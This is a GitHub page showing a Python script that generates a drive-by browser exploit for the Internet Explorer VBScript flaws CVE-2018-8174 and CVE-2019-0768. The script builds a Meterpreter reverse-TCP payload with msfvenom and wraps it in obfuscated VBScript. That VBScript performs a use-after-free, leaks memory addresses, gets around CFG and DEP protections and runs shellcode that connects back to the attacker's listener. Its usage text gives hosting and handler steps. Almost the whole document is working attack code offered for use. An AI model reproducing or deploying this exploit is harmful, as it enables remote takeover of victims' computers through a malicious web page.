-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathie11_vbscript.py
393 lines (365 loc) · 10.1 KB
/
ie11_vbscript.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
import sys
import subprocess
usage_text = """
Exploit Generator for CVE-2018-8174 & CVE-2019-0768
Prerequisite:
- Metasploit
- msfvenom
Usage: python ie11_vbscript.py [Listener IP] [Listener Port]
Instruction:
1. Use this script to generate "exploit.html"
2. Host the html file on your server
3. Setup a handler with windows/meterpreter/reverse_tcp in Metasploit
4. In your handler, set AutoRunScript with "post/windows/manage/migrate"
"""
if len(sys.argv) != 3:
print usage_text
sys.exit()
lhost = sys.argv[1]
lport = sys.argv[2]
#p = subprocess.call(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost])
p = subprocess.Popen(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost,"LPORT="+lport,"-b","'\\x00'","-f","js_le"],stdout=subprocess.PIPE)
out = p.communicate()
result = out[0]
payload = """
<!doctype html>
<html lang=\"en\">
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
<meta http-equiv=\"x-ua-compatible\" content=\"IE=5\">
<meta http-equiv=\"Expires\" content=\"0\">
<meta http-equiv=\"Pragma\" content=\"no-cache\">
<meta http-equiv=\"Cache-control\" content=\"no-cache\">
<meta http-equiv=\"Cache\" content=\"no-cache\">
</head>
<body>
<script language=\"VBScript.Encode\">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
IlII=195948557
lIlIIl=Unescape(\"%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000\")
lIIIll=Unescape(\"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000\")
IllI=195890093
Function IIIII(Domain)
lIlII=0
IllllI=0
IIlIIl=0
Id=CLng(Rnd*1000000)
lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lIlII=lIlII-(&h86d+6447-&H219b)
End If
IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
IIIII=Domain &\"?\" &Chr(IllllI) &\"=\" &Id &\"&\" &Chr(IIlIIl) &\"=\" &lIlII
End Function
Function lIIII(ByVal lIlIl)
IIll=\"\"
For index=0 To Len(lIlIl)-1
IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Next
IIll=IIll &\"00\"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &\"00\"
End If
For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
lIIII=lIIII &\"%u\" &lIlIll &lIIIlI
Next
End Function
Function lIlI(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),\"0\") &IIII \'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
lIlI=IIII
End Function
Function GetUint32(lIII)
Dim value
llll.mem(IlII+8)=lIII+4
llll.mem(IlII)=8 \'type string
value=llll.P0123456789
llll.mem(IlII)=2
GetUint32=value
End Function
Function IllIIl(lIII)
IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
llll.mem(IlII)=(&h713+3616-&H1530)
GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
On Error Resume Next
Dim lllll
lllll=llllll
lllll=null
SetMemValue lllll
LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
Dim llIl
llIl=IllIll And &hffff0000
Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
llIl=llIl-65536
Loop
GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
Dim lIIlI,IIIl
lIIlI=\"\"
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
Next
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim IIIIII
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim Illlll
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p
function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
Illlll=IllIIl(function_ordin+index*2)
p=GetUint32(function_rvas+Illlll*4)
GetProcAddr=dll_base+p
End Function
Function GetShellcode()
IIlI=Unescape(\"%u0000%u0000%u0000%u0000\") &Unescape(\"{shellcode}\" &lIIII(IIIII(\"\")))
IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape(\"%u4141\"))
GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=lIlI((value And &hffff0000)/&h10000,4)
Low=lIlI(value And &hffff,4)
EscapeAddress=Unescape(\"%u\" &Low &\"%u\" &High)
End Function
Function lIllIl
Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
IlllI=lIlI(NtContinueAddr,8)
IlIII=Mid(IlllI,1,2)
llllI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lIllI=Mid(IlllI,7,2)
IIlI=\"\"
IIlI=IIlI &\"%u0000%u\" &lIllI &\"00\"
For IIIl=1 To 3
IIlI=IIlI &\"%u\" &llllI &llIII
IIlI=IIlI &\"%u\" &lIllI &IlIII
Next
IIlI=IIlI &\"%u\" &llllI &llIII
IIlI=IIlI &\"%u00\" &IlIII
lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) \'bypass cfg
Dim IIlI
IIlI=String((100334-65536),Unescape(\"%u4141\"))
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(&h3000)
IIlI=IIlI &EscapeAddress(&h40)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
IIlI=IIlI &String(6,Unescape(\"%u4242\"))
IIlI=IIlI &lIllIl()
IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape(\"%u4141\"))
WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
Dim IIlI
Dim lllllI
lllllI=lIlll+&h23
IIlI=\"\"
IIlI=IIlI &EscapeAddress(lllllI)
IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape(\"%4141\"))
IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
IIlI=IIlI &EscapeAddress(&h1b)
IIlI=IIlI &EscapeAddress(0)
IIlI=IIlI &EscapeAddress(lIlll)
IIlI=IIlI &EscapeAddress(&h23)
IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape(\"%u4343\"))
ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
llll.mem(IlII)=&h4d \'DEP bypass
llll.mem(IlII+8)=0
msgbox(IlII) \'VT replaced
End Sub
Class cla1
Private Sub Class_Terminate()
Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
IllI=IllI+(&h14b5+2725-&H1f59)
lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
IllI=IllI+(&h880+542-&Ha9d)
lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set IIIlI(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set IllII(IIIl)=llII
Next
End Property
End Class
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set IIllI(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set IIllI(IIIl)=New llIIl
Next
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla1
Erase lIIl
Next
Set llll=New llIIl
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla2
Erase lIIl
Next
Set IIIIl=New llIIl
End Sub
Sub InitObjects
llll.SetProp(llllIl)
IIIIl.SetProp(IlIIII)
IlII=IIIIl.mem
End Sub
Sub StartExploit
UAF
InitObjects
vb_adrr=LeakVBAddr()
//Alert \"CScriptEntryPointObject Leak: 0x\" & Hex(vb_adrr) & vbcrlf & \"VirtualTable address: 0x\" & Hex(GetUint32(vb_adrr))
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
//Alert \"VBScript Base: 0x\" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,\"msvcrt.dll\")
//Alert \"MSVCRT Base: 0x\" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,\"kernelbase.dll\")
//Alert \"KernelBase Base: 0x\" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,\"ntdll.dll\")
//Alert \"Ntdll Base: 0x\" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,\"VirtualProtect\")
//Alert \"KernelBase!VirtualProtect Address 0x\" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,\"NtContinue\")
//Alert \"KernelBase!VirtualProtect Address 0x\" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
//Alert \"Shellcode Address 0x\" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
lIlll=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(lIlll)
llIIll=GetMemValue()
ExecuteShellcode
Alert \"Executing Shellcode\"
End Sub
StartExploit
</script>
</body>
</html>
""".format(shellcode=result)
f = open("exploit.html", "w")
f.write(payload)
f.close()